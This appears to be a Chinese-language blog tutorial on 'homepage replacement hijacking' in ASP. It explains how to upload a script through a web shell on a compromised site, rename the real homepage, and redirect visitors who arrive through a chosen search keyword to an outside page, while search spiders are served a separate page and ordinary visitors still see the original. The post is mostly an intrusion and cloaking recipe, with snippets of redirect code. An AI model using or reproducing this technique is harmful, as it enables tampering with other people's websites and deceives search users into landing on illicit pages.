张怡的个人主页
asp-主页替换劫持
主页替换劫持就是我们自己准备一个页面,把对方主页给替换掉,通过这样的方式来达到劫持的目的,正常访问还是显示原来的主页,但是通过百度访问或者通过我们指定的关键字访问,那么就会显示咱们准备好的这个页面;
而我们现在要讲的就是通过判断关键字跳转的,咱们在上面两节课讲的都是判断来路进行跳转的,而今天讲的这种是判断关键字跳转,不管你是百度或者搜狗的来路,只有搜索这个特定的关键词,才能够进行跳转,如果你虽然是百度来路,可是没经过我们自己设定的关键词的话,那么是不会跳转的;
首先来看用到的代码:
1.keywords1="%E5%8A%9E%E8%AF%81" '航空 这里是关键词
关键词可以模糊匹配,只要包含主词根
2.Response.Redirect("http://www.02722h.com/ek/916008368.txt") 这里是跳转网址
3.web_url2="http://www.zhiankj.com/catalog.asp" 给蜘蛛看的页面
4.Response.redirect("home.asp") 原网站主页
shell的主页是 index.asp 修改为 home.asp 然后把这段代码名字重命名为: index.asp 传入shell根目录即可!
5.测试
因为是关键词判断跳转,并不是来路跳转,所以必须等到快照出现且通过你劫持的关键词搜索到,点击才会有效果!
Others
其他分享